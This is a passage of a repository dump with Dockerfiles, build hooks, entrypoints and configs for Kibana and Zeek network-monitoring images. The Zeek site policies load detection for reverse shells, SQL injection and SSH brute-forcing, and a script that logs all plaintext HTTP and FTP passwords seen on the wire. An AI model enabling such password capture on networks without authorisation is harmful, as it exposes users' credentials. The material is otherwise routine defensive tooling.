5 | VERSION=$(cat LATEST)
6 | TAGS=($VERSION 7)
7 |
8 | for TAG in "${TAGS[@]}"; do
9 | echo "===> Tagging $IMAGE_NAME as $DOCKER_REPO:$TAG"
10 | docker tag $IMAGE_NAME $DOCKER_REPO:$TAG
11 | echo "===> Pushing $DOCKER_REPO:$TAG"
12 | docker push $DOCKER_REPO:$TAG
13 | done
--------------------------------------------------------------------------------
/zeek/kibana/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM node:10.23.1-alpine
2 |
3 | LABEL maintainer "https://github.com/blacktop"
4 |
5 | ENV VERSION 7.10.2
6 | ENV DOWNLOAD_URL https://artifacts.elastic.co/downloads/kibana
7 | ENV TARBALL "${DOWNLOAD_URL}/kibana-${VERSION}-linux-x86_64.tar.gz"
8 | ENV TARBALL_ASC "${DOWNLOAD_URL}/kibana-${VERSION}-linux-x86_64.tar.gz.asc"
9 | ENV TARBALL_SHA "aa68f850cc09cf5dcb7c0b48bb8df788ca58eaad38d96141b8e59917fd38b42c728c0968f7cb2c8132c5aaeb595525cdde0859554346c496f53c569e03abe412"
10 | ENV GPG_KEY "46095ACC8548582C1A2699A9D27D666CD88E42B4"
11 |
12 | ENV PATH /usr/share/kibana/bin:$PATH
13 |
14 | RUN apk add --no-cache bash su-exec libc6-compat
15 | RUN apk add --no-cache -t .build-deps wget ca-certificates gnupg openssl \
16 | && set -ex \
17 | && cd /tmp \
18 | && echo "===> Install Kibana..." \
19 | && wget --progress=bar:force -O kibana.tar.gz "$TARBALL"; \
20 | if [ "$TARBALL_SHA" ]; then \
21 | echo "$TARBALL_SHA *kibana.tar.gz" | sha512sum -c -; \
22 | fi; \
23 | if [ "$TARBALL_ASC" ]; then \
24 | wget --progress=bar:force -O kibana.tar.gz.asc "$TARBALL_ASC"; \
25 | export GNUPGHOME="$(mktemp -d)"; \
26 | ( gpg --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPG_KEY" \
27 | || gpg --keyserver pgp.mit.edu --recv-keys "$GPG_KEY" \
28 | || gpg --keyserver keyserver.pgp.com --recv-keys "$GPG_KEY" ); \
29 | gpg --batch --verify kibana.tar.gz.asc kibana.tar.gz; \
30 | rm -rf "$GNUPGHOME" kibana.tar.gz.asc || true; \
31 | fi; \
32 | tar -xf kibana.tar.gz \
33 | && ls -lah \
34 | && mv kibana-$VERSION-linux-x86_64 /usr/share/kibana \
35 | && adduser -DH -s /sbin/nologin kibana \
36 | # use alpine nodejs and not the bundled version
37 | && bundled='NODE="${DIR}/node/bin/node"' \
38 | && alpine_node='NODE="/usr/local/bin/node"' \
39 | && sed -i "s|$bundled|$alpine_node|g" /usr/share/kibana/bin/kibana-plugin \
40 | && sed -i "s|$bundled|$alpine_node|g" /usr/share/kibana/bin/kibana \
41 | && rm -rf /usr/share/kibana/node \
42 | && chown -R kibana:kibana /usr/share/kibana \
43 | && rm -rf /tmp/* \
44 | && apk del --purge .build-deps
45 |
46 | COPY config/kibana/kibana.yml /usr/share/kibana/config/kibana.yml
47 | COPY docker-entrypoint.sh /
48 | RUN chmod +x /docker-entrypoint.sh
49 |
50 | WORKDIR /usr/share/kibana
51 |
52 | EXPOSE 5601
53 |
54 | ENTRYPOINT ["/docker-entrypoint.sh"]
55 | CMD ["kibana"]
56 |
--------------------------------------------------------------------------------
/zeek/kibana/VERSION:
--------------------------------------------------------------------------------
1 | 5.0
2 |
--------------------------------------------------------------------------------
/zeek/kibana/config/kibana/kibana.yml:
--------------------------------------------------------------------------------
1 | # Kibana is served by a back end server. This setting specifies the port to use.
2 | #server.port: 5601
3 |
4 | # Specifies the address to which the Kibana server will bind. IP addresses and host names are both valid values.
5 | # The default is 'localhost', which usually means remote machines will not be able to connect.
6 | # To allow connections from remote users, set this parameter to a non-loopback address.
7 | server.name: kibana
8 | server.host: "0"
9 |
10 | # Enables you to specify a path to mount Kibana at if you are running behind a proxy.
11 | # Use the `server.rewriteBasePath` setting to tell Kibana if it should remove the basePath
12 | # from requests it receives, and to prevent a deprecation warning at startup.
13 | # This setting cannot end in a slash.
14 | #server.basePath: ""
15 |
16 | # Specifies whether Kibana should rewrite requests that are prefixed with
17 | # `server.basePath` or require that they are rewritten by your reverse proxy.
18 | # This setting was effectively always `false` before Kibana 6.3 and will
19 | # default to `true` starting in Kibana 7.0.
20 | #server.rewriteBasePath: false
21 |
22 | # The maximum payload size in bytes for incoming server requests.
23 | #server.maxPayloadBytes: 1048576
24 |
25 | # The Kibana server's name. This is used for display purposes.
26 | #server.name: "your-hostname"
27 |
28 | # The URLs of the Elasticsearch instances to use for all your queries.
29 | elasticsearch.hosts: ["http://elasticsearch:9200"]
30 | # When this setting's value is true Kibana uses the hostname specified in the server.host
31 | # setting. When the value of this setting is false, Kibana uses the hostname of the host
32 | # that connects to this Kibana instance.
33 | #elasticsearch.preserveHost: true
34 |
35 | # Kibana uses an index in Elasticsearch to store saved searches, visualizations and
36 | # dashboards. Kibana creates a new index if the index doesn't already exist.
37 | #kibana.index: ".kibana"
38 |
39 | # The default application to load.
40 | #kibana.defaultAppId: "home"
41 |
42 | # If your Elasticsearch is protected with basic authentication, these settings provide
43 | # the username and password that the Kibana server uses to perform maintenance on the Kibana
44 | # index at startup. Your Kibana users still need to authenticate with Elasticsearch, which
45 | # is proxied through the Kibana server.
46 | #elasticsearch.username: "user"
47 | #elasticsearch.password: "pass"
48 |
49 | # Enables SSL and paths to the PEM-format SSL certificate and SSL key files, respectively.
50 | # These settings enable SSL for outgoing requests from the Kibana server to the browser.
51 | #server.ssl.enabled: false
52 | #server.ssl.certificate: /path/to/your/server.crt
53 | #server.ssl.key: /path/to/your/server.key
54 |
55 | # Optional settings that provide the paths to the PEM-format SSL certificate and key files.
56 | # These files validate that your Elasticsearch backend uses the same key files.
57 | #elasticsearch.ssl.certificate: /path/to/your/client.crt
58 | #elasticsearch.ssl.key: /path/to/your/client.key
59 |
60 | # Optional setting that enables you to specify a path to the PEM file for the certificate
61 | # authority for your Elasticsearch instance.
62 | #elasticsearch.ssl.certificateAuthorities: [ "/path/to/your/CA.pem" ]
63 |
64 | # To disregard the validity of SSL certificates, change this setting's value to 'none'.
65 | #elasticsearch.ssl.verificationMode: full
66 |
67 | # Time in milliseconds to wait for Elasticsearch to respond to pings. Defaults to the value of
68 | # the elasticsearch.requestTimeout setting.
69 | #elasticsearch.pingTimeout: 1500
70 |
71 | # Time in milliseconds to wait for responses from the back end or Elasticsearch. This value
72 | # must be a positive integer.
73 | #elasticsearch.requestTimeout: 30000
74 |
75 | # List of Kibana client-side headers to send to Elasticsearch. To send *no* client-side
76 | # headers, set this value to [] (an empty list).
77 | #elasticsearch.requestHeadersWhitelist: [ authorization ]
78 |
79 | # Header names and values that are sent to Elasticsearch. Any custom headers cannot be overwritten
80 | # by client-side headers, regardless of the elasticsearch.requestHeadersWhitelist configuration.
81 | #elasticsearch.customHeaders: {}
82 |
83 | # Time in milliseconds for Elasticsearch to wait for responses from shards. Set to 0 to disable.
84 | #elasticsearch.shardTimeout: 30000
85 |
86 | # Time in milliseconds to wait for Elasticsearch at Kibana startup before retrying.
87 | #elasticsearch.startupTimeout: 5000
88 |
89 | # Logs queries sent to Elasticsearch. Requires logging.verbose set to true.
90 | #elasticsearch.logQueries: false
91 |
92 | # Specifies the path where Kibana creates the process ID file.
93 | #pid.file: /var/run/kibana.pid
94 |
95 | # Enables you to specify a file where Kibana stores log output.
96 | #logging.dest: stdout
97 |
98 | # Set the value of this setting to true to suppress all logging output.
99 | #logging.silent: false
100 |
101 | # Set the value of this setting to true to suppress all logging output other than error messages.
102 | #logging.quiet: false
103 |
104 | # Set the value of this setting to true to log all events, including system usage information
105 | # and all requests.
106 | #logging.verbose: false
107 |
108 | # Set the interval in milliseconds to sample system and process performance
109 | # metrics. Minimum is 100ms. Defaults to 5000.
110 | #ops.interval: 5000
111 |
112 | # Specifies locale to be used for all localizable strings, dates and number formats.
113 | #i18n.locale: "en"
114 |
115 | xpack.monitoring.ui.container.elasticsearch.enabled: true
116 |
--------------------------------------------------------------------------------
/zeek/kibana/config/logrotate:
--------------------------------------------------------------------------------
1 | /var/log/kibana/*.log {
2 | daily
3 | rotate 50
4 | size 50M
5 | copytruncate
6 | compress
7 | delaycompress
8 | missingok
9 | notifempty
10 | create 644 kibana kibana
11 | }
12 |
--------------------------------------------------------------------------------
/zeek/kibana/docker-entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | set -e
3 |
4 | declare -a kb_opts
5 |
6 | # Parse env vars of the form: kibana.setting=value
7 | while IFS='=' read -r envvar_key envvar_value
8 | do
9 | # Kibana settings need to have at least two dot-separated lowercase words, e.g. `server.name`
10 | if [[ "$envvar_key" =~ ^[a-z0-9_]+\.[a-z0-9_]+ ]]; then
11 | if [[ ! -z $envvar_value ]]; then
12 | kb_opt="--${envvar_key}=${envvar_value}"
13 | kb_opts+=("${kb_opt}")
14 | fi
15 | fi
16 | done < <(env)
17 |
18 | # Parse env vars of the form: KIBANA_SETTING=value
19 | while IFS='=' read -r envvar_key envvar_value
20 | do
21 | # Kibana env vars need to be prefixed with `KIBANA_`, e.g. `KIBANA_SERVER_NAME`
22 | if [[ "$envvar_key" =~ ^KIBANA_[A-Z0-9_]+ ]]; then
23 | kib_name=$(echo "${envvar_key#"KIBANA_"}" | tr '[:upper:]' '[:lower:]' | tr _ .)
24 | if [[ ! -z $envvar_value ]]; then
25 | kb_opt="--${kib_name}=${envvar_value}"
26 | kb_opts+=("${kb_opt}")
27 | fi
28 | fi
29 | done < <(env)
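# Example (hypothetical values): the two loops above turn
#   KIBANA_SERVER_NAME=my-kibana        into  --server.name=my-kibana
#   elasticsearch.hosts=http://es:9200  into  --elasticsearch.hosts=http://es:9200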
30 |
31 | # Take ownership of SSL certs
32 | if [[ -n "$KIBANA_SERVER_SSL" ]]; then
33 | if [[ -n "$KIBANA_SERVER_SSL_KEY" ]]; then
34 | chown kibana:kibana $KIBANA_SERVER_SSL_KEY
35 | fi
36 | if [[ -n "$KIBANA_SERVER_SSL_CERTIFICATE" ]]; then
37 | chown kibana:kibana $KIBANA_SERVER_SSL_CERTIFICATE
38 | fi
39 | fi
40 |
41 | # Add kibana as command if needed
42 | if [[ "$1" == -* ]]; then
43 | set -- kibana "$@"
44 | fi
45 |
46 | # Run as user "kibana" if the command is "kibana"
47 | if [ "$1" = 'kibana' -a "$(id -u)" = '0' ]; then
48 | echo "$@" "${kb_opts[@]}"
49 | set -- su-exec kibana "$@" "${kb_opts[@]}"
50 | fi
51 |
52 | exec "$@"
53 |
--------------------------------------------------------------------------------
/zeek/kibana/hooks/post_push:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | set -e
4 |
5 | VERSION=$(grep '^ENV VERSION' Dockerfile | cut -d" " -f3)
6 | TAGS=($VERSION 7)
7 |
8 | for TAG in "${TAGS[@]}"; do
9 | echo "===> Tagging $IMAGE_NAME as $DOCKER_REPO:$CACHE_TAG-$TAG"
10 | docker tag $IMAGE_NAME $DOCKER_REPO:$CACHE_TAG-$TAG
11 | echo "===> Pushing $DOCKER_REPO:$CACHE_TAG-$TAG"
12 | docker push $DOCKER_REPO:$CACHE_TAG-$TAG
13 | done
14 |
--------------------------------------------------------------------------------
/zeek/zeek/elastic/.dockerignore:
--------------------------------------------------------------------------------
1 | # Ignore .git folder
2 | .git*
3 |
4 | build
5 | extract_files
6 | CHANGELOG.md
7 | LICENSE
8 | Makefile
9 | README.md
10 | README.md.bu
11 | VERSION
12 | circle.yml
13 | docker-compose.yml
14 | logo.png
15 |
--------------------------------------------------------------------------------
/zeek/zeek/elastic/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM alpine:3.14 as builder
2 |
3 | LABEL maintainer "Nikhil"
4 |
5 | ENV ZEEK_VERSION 4.1.1
6 |
7 | RUN apk add --no-cache zlib openssl libstdc++ libpcap libgcc
8 | RUN apk add --no-cache -t .build-deps \
9 | bsd-compat-headers \
10 | libmaxminddb-dev \
11 | linux-headers \
12 | openssl-dev \
13 | libpcap-dev \
14 | python3-dev \
15 | zlib-dev \
16 | binutils \
17 | fts-dev \
18 | cmake \
19 | clang \
20 | bison \
21 | bash \
22 | swig \
23 | perl \
24 | make \
25 | flex \
26 | git \
27 | g++ \
28 | fts
29 |
30 | RUN echo "===> Cloning zeek..." \
31 | && cd /tmp \
32 | && git clone --recursive --branch v$ZEEK_VERSION https://github.com/zeek/zeek.git
33 |
34 | RUN echo "===> Compiling zeek..." \
35 | && cd /tmp/zeek \
36 | && CC=clang ./configure --prefix=/usr/local/zeek \
37 | --build-type=MinSizeRel \
38 | --disable-broker-tests \
39 | --disable-zeekctl \
40 | --disable-auxtools \
41 | --disable-python \
42 | && make -j 2 \
43 | && make install
44 |
45 | RUN echo "===> Compiling af_packet plugin..." \
46 | && cd /tmp/zeek/auxil/ \
47 | && git clone https://github.com/J-Gras/zeek-af_packet-plugin.git \
48 | && cd /tmp/zeek/auxil/zeek-af_packet-plugin \
49 | && CC=clang ./configure --with-kernel=/usr --zeek-dist=/tmp/zeek \
50 | && make -j 2 \
51 | && make install \
52 | && /usr/local/zeek/bin/zeek -NN Zeek::AF_Packet
53 |
54 | RUN echo "===> Installing hosom/file-extraction package..." \
55 | && cd /tmp \
56 | && git clone https://github.com/hosom/file-extraction.git \
57 | && mv file-extraction/scripts /usr/local/zeek/share/zeek/site/file-extraction
58 |
59 | RUN echo "===> Installing Community-Id..." \
60 | && cd /tmp \
61 | && git clone https://github.com/corelight/zeek-community-id.git \
62 | && cd /tmp/zeek-community-id \
63 | && CC=clang ./configure --zeek-dist=/tmp/zeek \
64 | && cd /tmp/zeek-community-id/build \
65 | && make -j 2 \
66 | && make install \
67 | && /usr/local/zeek/bin/zeek -NN Corelight::CommunityID
68 |
69 | RUN echo "===> Installing icsnpp-s7comm..." \
70 | && cd /tmp \
71 | && git clone https://github.com/cisagov/icsnpp-s7comm.git \
72 | && cd /tmp/icsnpp-s7comm/ \
73 | && CC=clang ./configure --zeek-dist=/tmp/zeek \
74 | && make -j 2 \
75 | && make install \
76 | && /usr/local/zeek/bin/zeek -NN ICSNPP::S7COMM
77 |
78 |
79 |
80 | RUN echo "===> Installing icsnpp-modbus..." \
81 | && cd /tmp \
82 | && git clone https://github.com/cisagov/icsnpp-modbus.git \
83 | && mv icsnpp-modbus/scripts/ /usr/local/zeek/share/zeek/site/icsnpp-modbus
84 |
85 | RUN echo "===> Installing corelight/json-streaming-logs package..." \
86 | && cd /tmp \
87 | && git clone https://github.com/corelight/json-streaming-logs.git json-streaming-logs \
88 | && find json-streaming-logs -name "*.bro" -exec sh -c 'mv "$1" "${1%.bro}.zeek"' _ {} \; \
89 | && mv json-streaming-logs/scripts /usr/local/zeek/share/zeek/site/json-streaming-logs
90 |
91 | # RUN echo "===> Shrinking image..." \
92 | # && strip -s /usr/local/zeek/bin/zeek
93 |
94 | RUN echo "===> Size of the Zeek install..." \
95 | && du -sh /usr/local/zeek
96 | ####################################################################################################
97 | FROM alpine:3.12 as geoip
98 |
99 | ENV MAXMIND_CITY https://geolite.maxmind.com/download/geoip/database/GeoLite2-City.tar.gz
100 | ENV MAXMIND_CNTRY https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country.tar.gz
101 | ENV MAXMIND_ASN http://geolite.maxmind.com/download/geoip/database/GeoLite2-ASN.tar.gz
102 | ENV GITHUB_CITY https://github.com/blacktop/docker-zeek/raw/master/maxmind/GeoLite2-City.tar.gz
103 | ENV GITHUB_CNTRY https://github.com/blacktop/docker-zeek/raw/master/maxmind/GeoLite2-Country.tar.gz
104 |
105 | # Install the GeoIPLite Database
106 | RUN cd /tmp \
107 | && mkdir -p /usr/share/GeoIP \
108 | && wget ${GITHUB_CITY} \
109 | && tar xzvf GeoLite2-City.tar.gz \
110 | && mv GeoLite2-City*/GeoLite2-City.mmdb /usr/share/GeoIP/
111 | # && wget ${MAXMIND_ASN} \
112 | # && tar xzvf GeoLite2-ASN.tar.gz \
113 | # && mv GeoLite2-ASN*/GeoLite2-ASN.mmdb /usr/share/GeoIP/
114 | ####################################################################################################
115 | FROM alpine:3.14
116 |
117 | LABEL maintainer "Nikhil"
118 |
119 | RUN apk --no-cache add ca-certificates zlib openssl libstdc++ libpcap libgcc fts libmaxminddb
120 |
121 | COPY --from=builder /usr/local/zeek /usr/local/zeek
122 | COPY local.zeek /usr/local/zeek/share/zeek/site/local.zeek
123 |
124 | # Add a few zeek scripts
125 | ADD https://raw.githubusercontent.com/blacktop/docker-zeek/master/scripts/conn-add-geodata.zeek \
126 | /usr/local/zeek/share/zeek/site/geodata/conn-add-geodata.zeek
127 | ADD https://raw.githubusercontent.com/blacktop/docker-zeek/master/scripts/log-passwords.zeek \
128 | /usr/local/zeek/share/zeek/site/passwords/log-passwords.zeek
129 |
130 | COPY --from=geoip /usr/share/GeoIP /usr/share/GeoIP
131 |
132 | WORKDIR /pcap
133 |
134 | ENV ZEEKPATH .:/data/config:/usr/local/zeek/share/zeek:/usr/local/zeek/share/zeek/policy:/usr/local/zeek/share/zeek/site
135 | ENV PATH $PATH:/usr/local/zeek/bin
136 |
137 | # RUN apk add py3-pip
138 | # RUN pip3 install GitPython semantic-version
139 | # RUN pip3 install zkg
140 | # RUN export GIT_PYTHON_REFRESH=quiet
141 | # RUN zkg autoconfig
142 | # RUN zkg refresh
143 | # RUN zkg install icsnpp-modbus
144 |
145 | # RUN zkg refresh
146 | # RUN zkg install icsnpp-s7comm
147 |
148 | ENTRYPOINT ["zeek"]
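# Example usage (the image tag "zeek-elastic" is hypothetical): mount a pcap
# directory onto /pcap and pass zeek arguments directly to the container:
#   docker run --rm -v "$(pwd)":/pcap zeek-elastic -r capture.pcap local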
149 |
150 |
--------------------------------------------------------------------------------
/zeek/zeek/elastic/local.zeek:
--------------------------------------------------------------------------------
1 | ##! Local site policy. Customize as appropriate.
2 | ##!
3 | ##! This file will not be overwritten when upgrading or reinstalling!
4 |
5 | # Installation-wide salt value that is used in some digest hashes, e.g., for
6 | # the creation of file IDs. Please change this to a hard to guess value.
7 | redef digest_salt = "blacktop";
8 |
9 | # This script logs which scripts were loaded during each run.
10 | @load misc/loaded-scripts
11 |
12 | # Apply the default tuning scripts for common tuning settings.
13 | @load tuning/defaults
14 |
15 | # Estimate and log capture loss.
16 | @load misc/capture-loss
17 |
18 | # Enable logging of memory, packet and lag statistics.
19 | @load misc/stats
20 |
21 | # Load the scan detection script. Note that it often causes
22 | # performance issues, so enable it cautiously.
23 | @load misc/scan
24 |
25 | # Detect traceroute being run on the network. This could possibly cause
26 | # performance trouble when there are a lot of traceroutes on your network.
27 | # Enable cautiously.
28 | #@load misc/detect-traceroute
29 |
30 | # Generate notices when vulnerable versions of software are discovered.
31 | # The default is to only monitor software found in the address space defined
32 | # as "local". Refer to the software framework's documentation for more
33 | # information.
34 | @load frameworks/software/vulnerable
35 |
36 | # Detect software changing (e.g. attacker installing hacked SSHD).
37 | @load frameworks/software/version-changes
38 |
39 | # This adds signatures to detect cleartext forward and reverse windows shells.
40 | @load-sigs frameworks/signatures/detect-windows-shells
41 |
42 | # Load all of the scripts that detect software in various protocols.
43 | @load protocols/ftp/software
44 | @load protocols/smtp/software
45 | @load protocols/ssh/software
46 | @load protocols/http/software
47 | # The detect-webapps script could possibly cause performance trouble when
48 | # running on live traffic. Enable it cautiously.
49 | @load protocols/http/detect-webapps
50 |
51 | # This script detects DNS results pointing toward your Site::local_nets
52 | # where the name is not part of your local DNS zone and is being hosted
53 | # externally. Requires that the Site::local_zones variable is defined.
54 | @load protocols/dns/detect-external-names
55 |
56 | # Script to detect various activity in FTP sessions.
57 | @load protocols/ftp/detect
58 |
59 | # Scripts that do asset tracking.
60 | @load protocols/conn/known-hosts
61 | @load protocols/conn/known-services
62 | @load protocols/ssl/known-certs
63 |
64 | # Script load ICS CISA
65 | # @load cisagov
66 |
67 | # This script enables SSL/TLS certificate validation.
68 | @load protocols/ssl/validate-certs
69 |
70 | # This script prevents the logging of SSL CA certificates in x509.log
71 | @load protocols/ssl/log-hostcerts-only
72 |
73 | # If you have GeoIP support built in, do some geographic detections and
74 | # logging for SSH traffic.
75 | @load protocols/ssh/geo-data
76 | # Detect hosts doing SSH bruteforce attacks.
77 | @load protocols/ssh/detect-bruteforcing
78 | # Detect logins using "interesting" hostnames.
79 | @load protocols/ssh/interesting-hostnames
80 |
81 | # Detect SQL injection attacks.
82 | @load protocols/http/detect-sqli
83 |
84 | #### Network File Handling ####
85 |
86 | # Enable MD5 and SHA1 hashing for all files.
87 | @load frameworks/files/hash-all-files
88 |
89 | # Detect SHA1 sums in Team Cymru's Malware Hash Registry.
90 | @load frameworks/files/detect-MHR
91 |
92 | # Extend email alerting to include hostnames
93 | @load policy/frameworks/notice/extend-email/hostnames
94 |
95 | # Detection of the heartbleed attack is enabled below. Enabling
96 | # this might impact performance a bit.
97 | @load policy/protocols/ssl/heartbleed
98 |
99 | # Logging of connection VLANs is enabled below. Enabling
100 | # this adds two VLAN fields to the conn.log file.
101 | @load policy/protocols/conn/vlan-logging
102 |
103 | # Logging of link-layer addresses is enabled below. Enabling
104 | # this adds the link-layer address for each connection endpoint to the conn.log file.
105 | @load policy/protocols/conn/mac-logging
106 |
107 | # Comment this to unload Corelight/CommunityID
108 | @load Corelight/CommunityID
109 |
110 | # Custom conn geoip enrichment
111 | @load geodata/conn-add-geodata.zeek
112 | # Log all plain-text http/ftp passwords
113 | @load passwords/log-passwords.zeek
114 |
115 | @load file-extraction
116 |
117 | # JSON Plugin
118 | # @load json-streaming-logs
119 | # redef JSONStreaming::disable_default_logs=T;
120 | redef LogAscii::use_json=T;
121 |
122 |
123 |
124 | #ICS Protocol
125 | @load icsnpp/s7comm
126 |
127 | #@load icsnpp-enip
128 |
129 | #@load icsnpp-dnp3
130 |
131 | @load icsnpp-modbus
--------------------------------------------------------------------------------
/zeek/zeek/zeekctl/.dockerignore:
--------------------------------------------------------------------------------
1 | # Ignore .git folder
2 | .git*
3 |
4 | build
5 | extract_files
6 | CHANGELOG.md
7 | LICENSE
8 | Makefile
9 | README.md
10 | README.md.bu
11 | VERSION
12 | circle.yml
13 | docker-compose.yml
14 | logo.png
15 |
--------------------------------------------------------------------------------
/zeek/zeek/zeekctl/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM alpine:3.14 as builder
2 |
3 |
4 | ENV ZEEK_VERSION 4.1.1
5 |
6 | RUN apk add --no-cache zlib openssl libstdc++ libpcap libgcc
7 | RUN apk add --no-cache -t .build-deps \
8 | bsd-compat-headers \
9 | libmaxminddb-dev \
10 | linux-headers \
11 | openssl-dev \
12 | libpcap-dev \
13 | python3-dev \
14 | zlib-dev \
15 | binutils \
16 | fts-dev \
17 | cmake \
18 | clang \
19 | bison \
20 | bash \
21 | swig \
22 | perl \
23 | make \
24 | flex \
25 | git \
26 | g++ \
27 | fts
28 |
29 | RUN echo "===> Cloning zeek..." \
30 | && cd /tmp \
31 | && git clone --recursive --branch v$ZEEK_VERSION https://github.com/zeek/zeek.git
32 |
33 | RUN echo "===> Compiling zeek..." \
34 | && cd /tmp/zeek \
35 | && CC=clang ./configure --prefix=/usr/local/zeek \
36 | --build-type=Release \
37 | --disable-broker-tests \
38 | --disable-auxtools \
39 | && make -j 2 \
40 | && make install
41 |
42 | RUN echo "===> Compiling af_packet plugin..." \
43 | && cd /tmp/zeek/auxil/ \
44 | && git clone https://github.com/J-Gras/zeek-af_packet-plugin.git \
45 | && cd /tmp/zeek/auxil/zeek-af_packet-plugin \
46 | && CC=clang ./configure --with-kernel=/usr --zeek-dist=/tmp/zeek \
47 | && make -j 2 \
48 | && make install \
49 | && /usr/local/zeek/bin/zeek -NN Zeek::AF_Packet
50 |
51 | RUN echo "===> Installing hosom/file-extraction package..." \
52 | && cd /tmp \
53 | && git clone https://github.com/hosom/file-extraction.git \
54 | && mv file-extraction/scripts /usr/local/zeek/share/zeek/site/file-extraction
55 |
56 | RUN echo "===> Installing Community-Id..." \
57 | && cd /tmp \
58 | && git clone https://github.com/corelight/zeek-community-id.git \
59 | && cd /tmp/zeek-community-id \
60 | && CC=clang ./configure --zeek-dist=/tmp/zeek \
61 | && cd /tmp/zeek-community-id/build \
62 | && make -j 2 \
63 | && make install \
64 | && /usr/local/zeek/bin/zeek -NN Corelight::CommunityID
65 |
66 | RUN echo "===> Shrinking image..." \
67 | && strip -s /usr/local/zeek/bin/zeek
68 |
69 | RUN echo "===> Size of the Zeek install..." \
70 | && du -sh /usr/local/zeek
71 | ####################################################################################################
72 | FROM alpine:3.14
73 |
74 |
75 | RUN apk --no-cache add ca-certificates zlib openssl libstdc++ libpcap libmaxminddb libgcc fts python3 bash
76 |
77 | COPY --from=builder /usr/local/zeek /usr/local/zeek
78 | COPY local.zeek /usr/local/zeek/share/zeek/site/local.zeek
79 |
80 | # Add a few zeek scripts
81 | ADD https://raw.githubusercontent.com/blacktop/docker-zeek/master/scripts/conn-add-geodata.zeek \
82 | /usr/local/zeek/share/zeek/site/geodata/conn-add-geodata.zeek
83 | ADD https://raw.githubusercontent.com/blacktop/docker-zeek/master/scripts/log-passwords.zeek \
84 | /usr/local/zeek/share/zeek/site/passwords/log-passwords.zeek
85 |
86 | WORKDIR /pcap
87 |
88 | ENV ZEEKPATH .:/data/config:/usr/local/zeek/share/zeek:/usr/local/zeek/share/zeek/policy:/usr/local/zeek/share/zeek/site
89 | ENV PATH $PATH:/usr/local/zeek/bin
90 |
91 | RUN zkg refresh
92 | RUN zkg install icsnpp-modbus
93 |
94 | RUN zkg refresh
95 | RUN zkg install icsnpp-s7comm
96 |
97 | ENTRYPOINT ["zeek"]
98 | CMD ["-h"]
99 |
--------------------------------------------------------------------------------
/zeek/zeek/zeekctl/hooks/post_push:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | set -e
4 |
5 | VERSION=$(grep '^ENV ZEEK_VERSION' Dockerfile | cut -d" " -f3)
6 | IMAGE_TAG=$(cut -d ":" -f 2 <<< "$IMAGE_NAME")
7 | TAGS=($VERSION 3)
8 |
9 | for TAG in "${TAGS[@]}"; do
10 | echo "===> Tagging $IMAGE_NAME as $DOCKER_REPO:$IMAGE_TAG-$TAG"
11 | docker tag $IMAGE_NAME $DOCKER_REPO:$IMAGE_TAG-$TAG
12 | echo "===> Pushing $DOCKER_REPO:$IMAGE_TAG-$TAG"
13 | docker push $DOCKER_REPO:$IMAGE_TAG-$TAG
14 | done
15 |
--------------------------------------------------------------------------------
/zeek/zeek/zeekctl/local.zeek:
--------------------------------------------------------------------------------
1 | ##! Local site policy. Customize as appropriate.
2 | ##!
3 | ##! This file will not be overwritten when upgrading or reinstalling!
4 |
5 | # Installation-wide salt value that is used in some digest hashes, e.g., for
6 | # the creation of file IDs. Please change this to a hard to guess value.
7 | redef digest_salt = "blacktop";
8 |
9 | # This script logs which scripts were loaded during each run.
10 | @load misc/loaded-scripts
11 |
12 | # Apply the default tuning scripts for common tuning settings.
13 | @load tuning/defaults
14 |
15 | # Estimate and log capture loss.
16 | @load misc/capture-loss
17 |
18 | # Enable logging of memory, packet and lag statistics.
19 | @load misc/stats
20 |
21 | # Load the scan detection script. It's disabled by default because
22 | # it often causes performance issues.
23 | #@load misc/scan
24 |
25 | # Detect traceroute being run on the network. This could possibly cause
26 | # performance trouble when there are a lot of traceroutes on your network.
27 | # Enable cautiously.
28 | #@load misc/detect-traceroute
29 |
30 | # Generate notices when vulnerable versions of software are discovered.
31 | # The default is to only monitor software found in the address space defined
32 | # as "local". Refer to the software framework's documentation for more
33 | # information.
34 | @load frameworks/software/vulnerable
35 |
36 | # Detect software changing (e.g. attacker installing hacked SSHD).
37 | @load frameworks/software/version-changes
38 |
39 | # This adds signatures to detect cleartext forward and reverse windows shells.
40 | @load-sigs frameworks/signatures/detect-windows-shells
41 |
42 | # Load all of the scripts that detect software in various protocols.
43 | @load protocols/ftp/software
44 | @load protocols/smtp/software
45 | @load protocols/ssh/software
46 | @load protocols/http/software
47 | # The detect-webapps script could possibly cause performance trouble when
48 | # running on live traffic. Enable it cautiously.
49 | #@load protocols/http/detect-webapps
50 |
51 | # This script detects DNS results pointing toward your Site::local_nets
52 | # where the name is not part of your local DNS zone and is being hosted
53 | # externally. Requires that the Site::local_zones variable is defined.
54 | @load protocols/dns/detect-external-names
55 |
56 | # Script to detect various activity in FTP sessions.
57 | @load protocols/ftp/detect
58 |
59 | # Scripts that do asset tracking.
60 | @load protocols/conn/known-hosts
61 | @load protocols/conn/known-services
62 | @load protocols/ssl/known-certs
63 |
64 | # This script enables SSL/TLS certificate validation.
65 | @load protocols/ssl/validate-certs
66 |
67 | # This script prevents the logging of SSL CA certificates in x509.log
68 | @load protocols/ssl/log-hostcerts-only
69 |
70 | # If you have GeoIP support built in, do some geographic detections and
71 | # logging for SSH traffic.
72 | @load protocols/ssh/geo-data
73 | # Detect hosts doing SSH bruteforce attacks.
74 | @load protocols/ssh/detect-bruteforcing
75 | # Detect logins using "interesting" hostnames.
76 | @load protocols/ssh/interesting-hostnames
77 |
78 | # Detect SQL injection attacks.
79 | @load protocols/http/detect-sqli
80 |
81 | #### Network File Handling ####
82 |
83 | # Enable MD5 and SHA1 hashing for all files.
84 | @load frameworks/files/hash-all-files
85 |
86 | # Detect SHA1 sums in Team Cymru's Malware Hash Registry.
87 | @load frameworks/files/detect-MHR
88 |
89 | # Extend email alerting to include hostnames
90 | @load policy/frameworks/notice/extend-email/hostnames
91 |
92 | # Uncomment the following line to enable detection of the heartbleed attack. Enabling
93 | # this might impact performance a bit.
94 | # @load policy/protocols/ssl/heartbleed
95 |
96 | # Uncomment the following line to enable logging of connection VLANs. Enabling
97 | # this adds two VLAN fields to the conn.log file.
